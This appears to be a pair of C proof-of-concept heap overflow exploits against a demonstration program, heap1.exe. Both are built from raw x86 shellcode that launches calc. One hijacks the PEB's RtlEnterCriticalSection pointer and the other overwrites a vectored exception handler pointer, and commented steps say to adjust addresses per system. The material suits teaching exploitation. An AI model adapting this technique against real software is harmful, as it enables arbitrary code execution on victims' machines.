int main() { unsigned char buffer[300]=""; unsigned char heap[8]=""; unsigned char pebf[8]=""; unsigned char shellcode[200]=""; unsigned int address_of_system = 0; unsigned int address_of_RtlEnterCriticalSection = 0; unsigned char tmp[8]=""; unsigned int cnt = 0; printf("Getting addresses...\n"); address_of_system = GetAddress("msvcrt.dll","system"); address_of_RtlEnterCriticalSection = GetAddress("ntdll.dll","RtlEnterCriticalSection"); if(address_of_system == 0 || address_of_RtlEnterCriticalSection == 0) return printf("Failed to get addresses\n"); printf("Address of msvcrt.system\t\t\t= %.8X\n",address_of_system); printf("Address of ntdll.RtlEnterCriticalSection\t= %.8X\n",address_of_RtlEnterCriticalSection); strcpy(buffer,"heap1 "); // Shellcode - repairs the PEB then calls system("calc"); strcat(buffer,"\"\x90\x90\x90\x90\x01\x90\x90\x6A\x30\x59\x64\x8B\x01\xB9"); fixupaddresses(tmp,address_of_RtlEnterCriticalSection); strcat(buffer,tmp); strcat(buffer,"\x89\x48\x20\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9"); fixupaddresses(tmp,address_of_system); strcat(buffer,tmp); strcat(buffer,"\xFF\xD1"); // Padding while(cnt < 58) { strcat(buffer,"DDDD"); cnt ++; } // Pointer to RtlEnterCriticalSection pointer - 4 in PEB strcat(buffer,"\x1C\xF0\xFD\x7f"); // Pointer to heap and thus shellcode strcat(buffer,"\x88\x06\x35"); strcat(buffer,"\""); printf("\nExecuting heap1.exe... calc should open.\n"); system(buffer); return 0; }
int main() { unsigned char buffer[300]=""; unsigned char heap[8]=""; unsigned char pebf[8]=""; unsigned char shellcode[200]=""; unsigned int address_of_system = 0; unsigned char tmp[8]=""; unsigned int cnt = 0; printf("Getting address of system...\n"); address_of_system = GetAddress("msvcrt.dll","system"); if(address_of_system == 0) return printf("Failed to get address.\n"); printf("Address of msvcrt.system\t\t\t= %.8X\n",address_of_system); strcpy(buffer,"heap1 "); while(cnt < 5) { strcat(buffer,"\x90\x90\x90\x90"); cnt ++; } // Shellcode to call system("calc"); strcat(buffer,"\x90\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9"); fixupaddresses(tmp,address_of_system); strcat(buffer,tmp); strcat(buffer,"\xFF\xD1");; cnt = 0; while(cnt < 58) { strcat(buffer,"DDDD"); cnt ++; } // Pointer to 0x77FC3210 - 4. 0x77FC3210 holds // the pointer to the first _VECTORED_EXCEPTION_NODE // structure. strcat(buffer,"\x0C\x32\xFC\x77"); // Pointer to our psueudo _VECTORED_EXCEPTION_NODE // structure at address 0x0012FF48. This address + 8 // contains a pointer to our allocated buffer. This // is what will be called when the vectored exception // handling kicks in. Modify this according to where // it can be found on your system strcat(buffer,"\x48\xff\x12\x00"); printf("\nExecuting heap1.exe... calc should open.\n"); system(buffer); return 0; }